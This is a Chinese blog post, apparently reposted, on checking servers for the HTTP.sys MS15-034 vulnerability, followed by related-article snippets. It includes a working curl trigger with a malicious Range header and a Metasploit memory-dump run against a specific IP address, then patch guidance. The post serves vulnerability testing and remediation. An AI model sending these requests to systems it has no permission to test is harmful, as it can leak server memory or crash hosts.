HTTP.SYS远程代码执行漏洞测试(ms15-034)

最新推荐文章于 2024-09-23 20:07:49 发布
最新推荐文章于 2024-09-23 20:07:49 发布
阅读量958 收藏
点赞数
文章标签: 操作系统
原文链接:http://www.cnblogs.com/someone9/p/9372163.html
版权

1.HTTP.SYS远程代码执行漏洞简介

首先漏洞编号:CVE-2015-1635(MS15-034 )

远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中,当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求时会导致此漏洞。 成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码。

利用HTTP.sys的安全漏洞,攻击者只需要发送恶意的http请求数据包,就可能远程读取IIS服务器的内存数据,或使服务器系统蓝屏崩溃。

主要影响了包括Windows 7、Windows Server 2008 R2、Windows 8、Windows Server 2012、Windows 8.1 和 Windows Server 2012 R2在内的主流服务器操作系统。

2.漏洞分析:

https://mp.weixin.qq.com/s/ZdRu_smJ0IW-dVVb9YB6UQ

3.漏洞验证:

3-1通过curl命令实现

curl -v IP -H "Host:irrelevant" -H "Range: bytes=0-18446744073709551615"

3-2 使用MSF中palyload进行测试

msf > use auxiliary/scanner/http/ms15_034_http_sys_memory_dump 
msf auxiliary(scanner/http/ms15_034_http_sys_memory_dump) > set rhosts 218.94.138.251
rhosts => 218.94.138.251
msf auxiliary(scanner/http/ms15_034_http_sys_memory_dump) > run

[+] Target may be vulnerable...  #验证存在
[+] Stand by...
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

 

如果服务器打上了补丁,那么响应状态应该是:

  1. HTTP Error 400. The request has an invalid header name.

如果服务器存在HTTP.SYS远程代码执行漏洞,那么响应状态应该是:

  1. HTTP/1.1 416 Requested Range Not Satisfiable

4.漏洞防御

官方补丁下载:https://support.microsoft.com/zh-cn/kb/3042553

临时解决办法:

* 禁用IIS内核缓存

参考文章:

http://www.tiaozhanziwo.com/archives/765.html

https://www.greatidc.com/news/189.html

转载于:https://www.cnblogs.com/someone9/p/9372163.html

复现awvs——HTTP.SYS远程代码执行漏洞(MS15-034)
记录并分享学习安全的知识点..
12-31 3821
一、MS15-034漏洞介绍 HTTP 协议堆栈 (HTTP.sys) 中存在一个远程代码执行漏洞,当 HTTP.sys 错误地解析特制 HTTP 请求时,会导致该漏洞。成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码。 造成危害如下: (1)远程读取IIS服务器的数据。 (2)造成服务器系统蓝屏崩溃(最可怕)。 二、影响范围 对于 Windows 7、Windows Server 2008 R2、Windows 8、Windows Server 2012、Windows 8.1 和
漏洞复现(二):HTTP.SYS远程代码执行漏洞(MS15-034)
weixin_47306547的博客
11-20 9419
漏洞介绍 漏洞编号:CVE-2015-1635(MS15-034远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中,当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求时会导致此漏洞。 成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码。 影响范围 Windows 7 Windows Server 2008 R2 Windows 8 Windows Server 2012 Windows 8.1 Windows Server 2012 R2 漏
HTTP.SYS远程代码执行漏洞测试
Bul1et的博客
11-09 6693
今天中午收到命令让下午两点出一个网站的测试报告  这么急也没详细的测试 就用awvs跑了一下  没想到跑出来一个高危HTTP.SYS远程代码执行漏洞测试 开始跑出来的时候很兴奋  一个高危也不错了    但是验证的时候可给我愁坏了 这里我非常推荐这篇博客  太详细了 http://www.cnblogs.com/peterpan0707007/p/8529261.html 然后我就想着用...
HTTP.SYS远程代码执⾏(MS15-034) MS-->Microsoft 2015 -034
最新发布
2301_81881972的博客
09-23 225
windows server 2012 IIS8.5
HTTP.sys ms15-034 远程代码执行漏㓊(CVE-2015-1635)
qq_68163788的博客
06-28 1389
HTTP.sys ms15-034 远程代码执行漏洞(CVE-2015-1635)是一种远程命令执行漏洞,允许攻击者通过发送特制的HTTP请求触发漏洞,从而在受影响的系统上执行恶意代码。这个漏洞在Microsoft Windows中的HTTP服务模块(HTTP.sys)中被发现。漏洞影响了Windows 7、Windows 8、Windows 8.1、Windows Server 2008 R2、Windows Server 2012和Windows Server 2012 R2。漏洞允许攻击者在系统上执行
HTTP.sys远程执行代码漏洞(CVE-2015-1635,MS15-034
Fly_鹏程万里
05-05 9044
前言 在2015年4月的补丁日,微软通过标记为“高危”的MS15-034补丁,修复了HTTP.SYS中一处远程代码漏洞CVE-2015-1635。据微软公告(https://technet.microsoft.com/en-us/library/security/MS15-034)所称,当存在该漏洞HTTP服务器接收到精心构造的HTTP请求时,可能触发远程代码在目标系统以系统权限执行。 影响...
HTTP.SYS远程代码执行漏洞
qq_44905657的博客
12-21 3331
HTTP.SYS远程代码执行漏洞
MS15-034 HTTP.sys远程执行代码漏洞(原理扫描)
11-16
https://docs.microsoft.com/zh-cn/security-updates/securitybulletins/2015/ms15-034 如果在一台Windows Server 2012 R2的服务器上直接安装补丁文件KB3042553,可能会出现“此更新不适用于您的计算机”的问题,这...
MS15-034 HTTP.sys 远程执行代码(CVE-2015-1635)POC
03-19
远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中,当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求时会导致此漏洞。 成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码
HTTP.sys远程代码执行漏洞(MS15-034)(CVE-2015-1635) 漏洞修复
08-21
Microsoft Windows HTTP.sys远程代码执行漏洞 (MS15-034)(CVE-2015-1635)
HTTP.sys 远程代码执行漏洞
山兔的博客
05-27 234
18446744073709551615转为十六进制即是 0xFFFFFFFFFFFFFFFF(16个F),是64位无符号整形所能表达的最大整数,这个“整数溢出”必然同这个异常的超大整数有关,若IIS服务器返回“416 Requested Range Not Satisfiable”,则是存在漏洞,若返回”The request has an invalid header name“,或其他状态码则说明漏洞已经修补。 对目标网站抓包,一般使用.js、.css、或图片类文件进行验证,在数据包中加入Range:
MS15-034HTTP.sys 远程执行代码
05-04
给内网应用的伙伴们一个福利 在微软4月14日补丁日发布的补丁中,有一个针对IIS服务器的远程代码执行漏洞危害非常大, 漏洞信息 远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中,当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求时会导致此漏洞。 成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码。 若要利用此漏洞,攻击者必须将经特殊设计的 HTTP 请求发送到受影响的系统。 通过修改 Windows HTTP 堆栈处理请求的方式,安装更新可以修复此漏洞。 Microsoft 通过协同的漏洞披露渠道了解到此漏洞的信息。 在最初发布此安全公告时,Microsoft 未收到任何表明此漏洞已公开用于攻击用户的信息。 CVE编号:CVE-2015-1635 CNNVD编号:CNNVD-201504-257
ms15-034漏洞监测脚本
05-09
可以通过使服务器蓝屏崩溃监测服务器是否存在漏洞,以便修改加固。
HTTP.sys远程代码执行漏洞
Lancis的博客
01-27 541
漏洞描述 Http.sys是Microsoft Windows处理HTTP请求的内核驱动程序。HTTP.sys会错误解析某些特殊构造的HTTP请求,导致远程代码执行漏洞。成功利用此漏洞后,攻击者可在System帐户上下文中执行任意代码。由于此漏洞存在于内核驱动程序中,攻击者也可以远程导致操作系统蓝屏。此次受影响的系统中,Windows7、Windows8、WindowsServer 2008 R2和WindowsServer 2012所带的HTTP.sys驱动均存在一个远程代码执行漏洞远程攻击者可以通..
HTTP.SYS远程代码执行漏洞(蓝屏洞)
热门推荐
qq_60905276的博客
03-26 1万+
1.简介 远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中,当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求时会导致此漏洞。 成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码。不过我看了一下这个HTTP.SYS还发生过其他的远程代码执行漏洞,我还是表明它的漏洞编号吧。 CVE-2015-1635(MS15-034 ) 而HTTP.SYS是一个位于Win2003和WinXP SP2中的操作系统核心组件,能够让任何应用程序通过它提供的接口,以http协议进行信息通
HTTP.SYS远程代码执行漏洞验证及其复现(CVE-2015-1635蓝屏洞)
weixin_74985952的博客
06-13 4099
HTTP.sys是Microsoft Windows处理HTTP请求的内核驱动程序,为了优化IIS服务器性能,从IIS6.0引入,IIS服务进程依赖HTTP.sysHTTP.sys远程代码执行漏洞实质是HTTP.sys的整数溢出漏洞
每日漏洞 | HTTP.sys远程代码执行
03-12 1861
每日漏洞 | HTTP.sys远程代码执行
HTTP.sys远程代码执行漏洞复现
weixin_45200712的博客
08-27 4088
一.漏洞描述 Http.sys是Microsoft Windows处理HTTP请求的内核驱动程序。HTTP.sys会错误解析某些特殊构造的HTTP请求,导致远程代码执行漏洞。成功利用此漏洞后,攻击者可在System帐户上下文中执行任意代码。由于此漏洞存在于内核驱动程序中,攻击者也可以远程导致操作系统蓝屏。此次受影响的系统中,Windows 7、Windows 8、Windows Server 2008 R2 和 Windows Server 2012所带的HTTP.sys驱动均存在一个远程代码执行漏洞远程
Microsoft Windows HTTP.sys远程代码执行漏洞(MS15-034)(CVE-2015-1635)【原理扫描】
05-24
Microsoft Windows HTTP.sys远程代码执行漏洞(MS15-034)(CVE-2015-1635)是一种存在于HTTP协议栈中的安全漏洞,可以导致远程攻击者在未经身份验证的情况下以SYSTEM权限执行任意代码。攻击者可以通过发送特制的HTTP...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值